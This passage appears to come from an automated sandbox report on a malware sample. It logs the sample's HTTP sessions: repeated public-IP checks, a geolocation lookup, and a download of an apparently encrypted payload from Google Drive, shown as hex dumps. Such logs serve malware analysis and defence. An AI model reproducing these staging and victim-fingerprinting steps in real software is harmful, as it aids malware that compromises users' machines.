                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.1050016132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:40.211007118 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:41.891834021 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:50:41 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.1050018132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:42.823199987 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:44.516010046 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:50:44 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.1050020132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:45.474809885 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:46.175745010 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:50:46 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.1050022132.226.247.73803144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:47.200298071 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:47.879390001 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:50:47 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            24192.168.2.1050024132.226.247.7380
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:50:52.300959110 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:50:53.977969885 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:50:53 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.1049967172.217.23.1104433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:49:32 UTC216OUTGET /uc?export=download&id=1Nvqe3aBlyD0Q9XkRU4GaNGiKCDXz7GCU HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                            Host: drive.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2025-01-10 20:49:32 UTC1920INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 10 Jan 2025 20:49:32 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=1Nvqe3aBlyD0Q9XkRU4GaNGiKCDXz7GCU&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'nonce-Pgpp2cezzCb2ahq6HNdcdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.1049974142.250.186.1614433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:49:33 UTC258OUTGET /download?id=1Nvqe3aBlyD0Q9XkRU4GaNGiKCDXz7GCU&export=download HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:49:36 UTC4933INHTTP/1.1 200 OK
                                                                                                            X-GUploader-UploadID: AFIdbgRJtXU5LTCDdqVIxtwPhc8sgzvWjfStlEdnsIm0ofQjbtgvvRv_sHa31hi7WJ8NE2pz
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Security-Policy: sandbox
                                                                                                            Content-Security-Policy: default-src 'none'
                                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                                            X-Content-Security-Policy: sandbox
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Content-Disposition: attachment; filename="oBxvnIWumgF65.bin"
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Credentials: false
                                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 94272
                                                                                                            Last-Modified: Tue, 10 Dec 2024 23:28:45 GMT
                                                                                                            Date: Fri, 10 Jan 2025 20:49:35 GMT
                                                                                                            Expires: Fri, 10 Jan 2025 20:49:35 GMT
                                                                                                            Cache-Control: private, max-age=0
                                                                                                            X-Goog-Hash: crc32c=kCha6w==
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close
                                                                                                            2025-01-10 20:49:36 UTC4933INData Raw: 2c cb 27 0c 4e 24 1f da 59 85 a7 7a 2b ea 24 97 a2 a9 59 37 7e bf aa b5 18 54 3c e7 ac 5a cd 05 4a 7b c7 7a 6b 9f 81 61 04 0c 1a de b8 49 c3 7e ab 6b 47 c4 50 4c d3 da 58 76 b1 d7 ed 09 00 58 fb 07 b1 78 07 3a 1f 9e 7a ad 5d af e7 ea f9 73 27 cb 13 7f d5 6e 7d 60 20 04 67 9a 24 56 5d f6 40 4f 6f a3 09 78 af 81 26 26 4a 87 f7 23 d1 71 2e 06 05 36 aa f4 7c bd f0 3d 0e 93 44 b4 e2 df 7a 71 da 34 7e 16 d3 5b 19 dc 6b 4f 68 73 8d 4c e5 b3 b2 aa c7 79 38 1d 88 f5 2e 7d 4c f9 dd 57 c3 b0 9a c1 39 0a 7a c7 cf d9 cb b9 fe fb 67 60 d9 8a 1d b3 44 d1 b3 e5 eb c0 e7 28 70 d2 01 4c 1b 36 f5 ae 7b 92 44 4b dc 4d fe 6e f2 ac 2b b2 be 33 37 2e c1 0d 07 72 61 aa 76 2d 6a 76 c4 6c 91 53 52 0a 24 e6 58 01 7a bd 01 13 5d 54 35 53 29 c4 08 61 7c 92 d7 04 da d2 b2 ec d0 9a e5
                                                                                                            Data Ascii: ,'N$Yz+$Y7~T<ZJ{zkaI~kGPLXvXx:z]s'n}` g$V]@Oox&&J#q.6|=Dzq4~[kOhsLy8.}LW9zg`D(pL6{DKMn+37.rav-jvlSR$Xz]T5S)a|
                                                                                                            2025-01-10 20:49:36 UTC4831INData Raw: f9 13 8a e0 6a d0 d7 66 18 f2 86 8e e4 ec b5 4d 96 c9 1a ad e7 29 e8 b6 e4 ea 2d 10 70 cf 7f e7 fb d6 69 5c cb 36 c9 9b 36 ad db dd cc 99 9f 25 ca 6b 91 a4 c4 f6 93 be 57 5e a6 1a d9 48 6f 41 ef 30 db 8b 9c 9e 57 f5 14 e3 ef e2 94 bd fa 0d a9 d3 70 29 78 9e c2 57 b9 e0 d5 71 88 18 6a d9 c7 81 d4 9d e0 b5 cd c6 62 aa ee 40 e7 dc 5a 28 bc 24 ef 81 1c 40 0b 5f 66 e9 c6 d6 45 ec 16 0a 1d 47 0a 5d c6 16 fc 3a 39 52 aa 22 67 c3 e8 4f 05 19 00 ad 27 4f d0 57 74 04 a1 45 e7 58 a2 fe 42 14 22 5a 36 d7 00 3f 8b 57 9a f4 a9 1f 6a a5 cc 59 5b 39 a4 d4 2b 49 17 d4 19 fa 21 2c 5e c6 bf b7 eb be f2 3d ac 8a 51 2a b6 d0 c8 a6 83 e3 22 2e ef a6 b3 46 6c 48 13 cf 0a 15 26 d5 2c 52 0a 2c ab ba 84 1a c0 f8 88 7b 60 dd 5f c5 9b f1 4b 3e 3e c0 75 f4 73 f2 fd 59 1f be 86 a3 5b
                                                                                                            Data Ascii: jfM)-pi\66%kW^HoA0Wp)xWqjb@Z($@_fEG]:9R"gO'OWtEXB"Z6?WjY[9+I!,^=Q*".FlH&,R,{`_K>>usY[
                                                                                                            2025-01-10 20:49:36 UTC1325INData Raw: d5 f8 7a 52 f7 4b 4b fe 2e df 1e c8 90 c8 24 28 cb 98 41 97 32 82 48 18 c7 89 52 1a 1a 7c 4a ef 19 e3 ff 8c ef fc 01 7c 02 52 27 57 82 b3 b5 81 8d 61 9b 9d b6 02 d5 38 56 f1 5f fb 50 74 cc c1 ab 90 c9 94 32 90 4e 1e be b6 9d f0 16 b6 64 c2 73 f3 6a cc 35 6a d8 8f 56 55 c4 c6 f1 79 1c 8c 16 33 27 be d4 4e 0d 15 95 6d 28 14 04 01 54 39 d6 79 9c 66 fd a1 f2 03 b0 a7 0d 70 76 6d a7 9f ae 29 d7 86 58 36 44 63 0f 09 1e ba 09 a1 ea 85 b7 c3 82 44 45 1a 3f d8 5e 42 a6 26 ab 3d ad 8c ca 97 04 1a cc 5e c7 5f 9d f2 a7 aa 5a ee 0f 0e 85 f5 31 d6 4b ad ac e2 14 f9 69 42 36 2f 2b 11 d4 cc 52 cd 44 0d 4c 85 21 3b a6 92 0d d6 fc b7 83 22 29 e7 80 34 de 1e 74 ff 92 3e 3f 68 3f 3f 96 cb 88 28 94 39 a0 5b 8b ef c4 80 b1 8a 1b 04 45 37 97 35 af b4 23 1c 78 04 3e 61 a0 7e ad
                                                                                                            Data Ascii: zRKK.$(A2HR|J|R'Wa8V_Pt2Ndsj5jVUy3'Nm(T9yfpvm)X6DcDE?^B&=^_Z1KiB6/+RDL!;")4t>?h??(9[E75#x>a~
                                                                                                            2025-01-10 20:49:36 UTC1390INData Raw: 1e 58 9e 13 83 c1 f8 8a b1 0a a9 34 54 df ce 86 39 ae 01 76 26 22 97 54 0d 93 46 28 17 c2 3a 1f 98 dc 88 41 dd 78 00 f9 03 3d e3 b3 7f d5 64 6e 64 1e 0b 67 9a 20 47 59 de 0e 4f 6f a9 89 77 af 81 22 26 58 85 df fe d1 71 24 15 00 27 af d9 ed 63 ff 2f 0c 6d d2 b8 e2 df 6f 01 61 3a 7e a8 da 4a 38 4f 68 03 a5 78 d8 34 8c c0 90 da a8 16 25 f8 e9 97 0e 1e 2d 97 a8 08 bd 90 b2 a7 19 78 23 a9 ef a1 a5 ea 63 b4 34 4a bf ff f4 e9 6a dc bf ca d9 b2 2d 3d 70 a2 a3 69 5c 01 13 bb 37 e3 e5 6e 73 05 89 c9 f2 dc 89 97 a7 41 29 38 21 7d a7 7f 7e b8 22 37 e7 81 c5 6c 90 7e 44 74 fa e6 58 0b d6 02 16 13 2d 1b ea 53 29 6e ab 44 6b ec 49 04 da f8 c0 01 c6 98 95 be 53 48 3f 60 6e 45 a2 8c 5b 82 bc c3 10 65 21 f6 20 8d 04 eb de ec c9 37 7e 7d 01 1b c3 52 c3 f1 f5 69 86 69 31 a5
                                                                                                            Data Ascii: X4T9v&"TF(:Ax=dndg GYOow"&Xq$'c/moa:~J8Ohx4%-x#c4Jj-=pi\7nsA)8!}~"7l~DtX-S)nDkISH?`nE[e! 7~}Rii1
                                                                                                            2025-01-10 20:49:36 UTC1390INData Raw: 17 7f 45 c0 5c 51 af 1b cd b0 46 93 52 a7 d6 39 8d e0 c6 d6 6d b8 7b ee 20 36 55 96 67 69 71 45 bc b8 ed 6c 78 31 60 cb bf aa 4a 01 ab 6c 15 91 66 59 c8 9a 53 e5 da 09 f0 e3 f3 35 75 50 14 8e cf ee 3c b9 59 61 90 c3 2d 0b 2b d8 51 0b 64 e6 98 d7 37 c3 1a c8 62 2c f6 1d 68 a2 1d 10 4a 08 b8 0e cd c9 9b e5 1a 05 ff 9e 38 b4 c7 73 51 39 86 e4 9b ab 5a ed 20 2d 7c 24 c7 e4 a5 0e 31 db d7 ba 7a d5 56 a8 1e 9e 89 ac 93 b1 a5 c3 dc 13 6a 4f 6c d7 1a 5f bd d1 d2 63 58 7d da 54 02 71 7e 56 8f f1 87 24 c9 eb 77 a0 35 f9 07 b1 82 0a e1 73 ca 4d d3 f3 5d 76 24 33 5c 89 59 f8 0f 99 fc 7c a3 4d 7b 09 e5 b2 7e ed fa bd d2 e9 b5 8e bc f3 32 f3 2e a3 58 2d 10 70 dc 1e e4 e5 c4 72 5c 85 36 c9 9b 1e 3d d7 dd cf a6 8e 5e 47 6f 91 d4 dd d6 5e 76 36 f9 94 29 a9 27 96 52 eb 3a
                                                                                                            Data Ascii: E\QFR9m{ 6UgiqElx1`JlfYS5uP<Ya-+Qd7b,hJ8sQ9Z -|$1zVjOl_cX}Tq~V$w5sM]v$3\Y|M{~2.X-pr\6=^Go^v6)'R:
                                                                                                            2025-01-10 20:49:36 UTC1390INData Raw: 33 ab c7 9e db b0 f4 c6 53 ac ee 52 95 50 5a 19 b6 37 f8 90 18 4c dd 44 66 9d 9d 15 45 ec 16 6e 85 ca 53 57 c6 06 f6 52 9e aa aa 28 13 f4 16 4e 0c 7f 83 a8 36 40 fc 4f 66 3f 34 45 df 8f d0 8e 49 14 20 90 1b d7 70 27 97 93 9a f4 a9 30 05 5f cc 53 3e 83 5f d4 21 43 15 d4 7a f8 49 d0 2e b8 a8 a4 e3 91 c3 be af e5 5f 02 f1 da e0 96 ec 70 28 3d ec b7 c4 20 f1 48 17 bd 8d 1f 37 d5 50 a8 1b 2a ce 3c 8f 0b c1 fa 83 05 fa f1 46 de 91 e0 95 3e 3e ce 11 0c 8c f2 f7 40 78 c0 9c a3 51 85 19 1a 5e b3 17 eb 95 b5 33 63 57 1b 0f 51 5a a3 da 2f bd d6 aa d0 54 69 e2 73 ba 23 fe 02 32 f9 00 28 4a bf d7 dd 08 26 61 e8 50 42 40 63 eb f1 d6 14 fd 74 cf 7e 84 04 ca 8f 6b 45 2d 43 9c 7f 49 4f 07 37 02 7b 3f ed f5 d8 33 96 0f 6e 36 ff f2 fd 72 b4 91 cf 9b ee be 55 77 21 a3 1a 22
                                                                                                            Data Ascii: 3SRPZ7LDfEnSWR(N6@Of?4EI p'0_S>_!CzI._p(= H7P*<F>>@xQ^3cWQZ/Tis#2(J&aPB@ct~kE-CIO7{?3n6rUw!"
                                                                                                            2025-01-10 20:49:36 UTC1390INData Raw: c6 53 cc 96 53 1a a7 31 79 4d 6c 65 70 bc 4a 11 42 24 fd 28 fe 8a c5 23 85 91 39 fb 10 1e fd 04 52 83 fd 40 46 ba 22 de 1e cc 93 ad f1 53 81 9e 4d 9b 42 a3 1f 18 b7 e2 a8 c8 1a 7a 66 e7 74 35 71 e5 94 a6 db 6f 00 46 36 2b f7 a4 b4 85 a5 b8 8a 9a ce 17 85 38 26 9a 8a fb 7a 72 c1 c9 a9 a7 b9 ea b4 90 3e 71 4f b6 9d e7 05 b0 17 95 74 81 f2 ae 66 1a b7 50 7e 01 c2 d5 fe 62 1f b7 81 22 23 94 ca 44 67 5b b9 2e 2a 14 d4 00 54 39 b9 7d 9d 64 8c 84 f7 02 b4 d3 76 e4 76 67 89 d8 a7 38 d4 99 a1 24 52 78 1b 2f 05 46 73 f8 e1 94 b8 c7 47 6c ef 10 3f d2 4f 45 b2 31 ab 3d a3 e3 90 bf 91 10 e4 0c d4 5a 97 fe af 92 7c ff 21 88 88 f7 40 96 5a aa da 56 db f9 19 27 e3 2f 2b 15 c0 df 52 cd 4a 5b a3 85 21 37 9d c3 0d c7 f2 c8 68 34 2e 86 91 30 52 1c 0f b9 84 c0 38 51 e9 4d 74
                                                                                                            Data Ascii: SS1yMlepJB$(#9R@F"SMBzft5qoF6+8&zr>qOtfP~b"#Dg[.*T9}dvvg8$Rx/FsGl?OE1=Z|!@ZV'/+RJ[!7h4.0R8QMt
                                                                                                            2025-01-10 20:49:36 UTC1390INData Raw: 4e a7 09 1d d5 30 99 e3 10 7e d5 64 12 64 61 04 6d f5 21 57 5d fc 68 db 6f a3 0f 6b a6 90 2f 32 b4 86 e4 29 c0 7b 38 f8 04 25 a1 e5 77 91 e6 15 a4 93 c4 be f3 da 1b 31 60 3a 74 b3 d3 be ad 64 6a 05 b6 57 d9 24 8c eb b2 da 9d bc 5f 6f e3 90 1f 19 5f 0b af 38 c7 ff 2d a4 19 7e 60 f6 ef b0 af b1 06 b4 34 46 a7 e0 79 c7 6e ae 5c ea cf b0 f1 00 f1 d2 01 46 5d 8d f6 bf 32 e1 a5 4e 6b 07 9d f7 73 ac 2b b8 a8 cd 34 71 32 01 14 7f 46 e6 3b a0 55 10 c5 6d b4 4d 20 ec 30 e6 28 a3 81 2f 09 b1 78 6c 47 7f 3c 64 79 c3 59 8b 86 00 78 d7 a8 9e 96 8d e5 a1 2e 6d 24 7b c9 c2 9f ee f7 ac 9c c9 12 23 1e 56 50 e2 d1 f8 d3 98 64 12 67 07 ce 16 eb 16 b1 66 e7 e9 f9 06 ee a1 9b 3a b0 b1 57 6a 64 12 72 91 15 f4 77 c2 dc 98 a9 3b e3 dd 02 51 75 35 55 7a ed e5 2d a6 3d 2d 45 d1 5a
                                                                                                            Data Ascii: N0~ddam!W]hok/2){8%w1`:tdjW$_o_8-~`4Fyn\F]2Nks+4q2F;UmM 0(/xlG<dyYx.m${#VPdgf:Wjdrw;Qu5Uz-=-EZ
                                                                                                            2025-01-10 20:49:36 UTC1390INData Raw: 03 e7 27 48 40 ac ba 51 19 27 3b 50 82 1a 60 8a b6 1e f2 44 27 e1 f2 eb 63 93 22 f2 90 dc 8c 8f 8e 21 99 32 e6 3f ce 14 de 40 68 d1 19 96 10 be 38 3f d2 11 79 f7 0b 0b 15 4a e9 5e 0d 6a 38 c7 aa 42 d6 0e 63 4c a5 f7 46 c7 79 48 12 e9 ff 8d 3a 7e 2c 2d 05 32 da c6 fd 32 10 26 c8 ca ab 63 e8 57 a9 db 95 8e 96 91 a0 b4 ee 24 ed 84 a3 7b 0d d7 55 8e ea fa 5b 6e 75 c9 5a 13 4d 3d 4d 1e e4 79 15 de d0 22 ad 2e 68 18 ce ad 04 e3 67 db 56 15 ed 60 88 4f 24 a2 88 62 f9 19 8a a4 6d bf 5f 7d 28 fc 8b fb ed fa bd f0 ff a6 81 ad f8 3f c0 67 8b 9c 27 62 49 ec 01 85 d3 98 6d 74 4a 3c c9 97 1e 8b d7 dd cf be 9f 15 e3 6b 91 a4 c8 85 98 60 44 7d 82 21 ab 12 79 52 9b 5f 21 d9 9c 98 7b 20 6c 32 ef e2 92 aa 20 60 b7 c5 63 2a 32 df c8 57 c9 fe ec f7 fa 70 7c cf 49 ef 12 98 f1
                                                                                                            Data Ascii: 'H@Q';P`D'c"!2?@h8?yJ^j8BcLFyH:~,-22&cW${U[nuZM=My".hgV`O$bm_}(?g'bImtJ<k`D}!yR_!{ l2 `c*2Wp|I
                                                                                                            2025-01-10 20:49:36 UTC1390INData Raw: 57 c6 2d bb 49 b6 52 aa 28 19 e2 fb 4f 01 76 c7 ac 27 45 ba 47 72 2c 20 45 e7 52 94 8e 49 15 49 42 04 d7 7c 38 e4 6a a9 f4 a3 26 2d ba d0 7b ec ab a4 de 53 d0 23 d2 1b d6 68 2c 2e b2 a8 b7 ed 92 78 af a7 80 2a 05 c8 96 c9 ac ec 76 51 f9 e5 a6 cb 58 64 3a 4d a0 9e 65 49 0d 3f 55 1d 0c cc 40 57 1a ca ef 98 ce e5 db 49 dc 9c b7 7c 3f 3e c4 0e 72 74 80 9f 56 17 b0 f2 76 5b ad 75 17 56 a8 1c 99 eb a9 22 1b 57 4e 0f 51 56 a3 d3 36 a1 fc 68 92 5f 78 9a 69 7e 23 fe 05 0d f1 00 25 17 3d d7 dd 0f 5a 68 f9 58 64 03 b9 cb 7c be 0f 2d 0c 11 68 52 83 fc 8a 6a 44 34 6c 00 64 58 4e 02 36 9d 1b 30 c9 dc ad 39 87 0f 78 c8 ef e6 e2 75 97 5a d9 b3 4e ad 51 a3 10 83 5d 4e 73 0e 80 a4 6c 87 29 0f 2a 58 41 34 b8 56 1f 37 26 56 94 ad 83 19 95 5b 97 17 65 67 79 df b6 40 18 96 53
                                                                                                            Data Ascii: W-IR(Ov'EGr, ERIIB|8j&-{S#h,.x*vQXd:MeI?U@WI|?>rtVv[uV"WNQV6h_xi~#%=ZhXd|-hRjD4ldXN609xuZNQ]Nsl)*XA4V7&V[egy@S


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.1049977104.21.48.14433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:49:38 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:49:38 UTC857INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:49:38 GMT
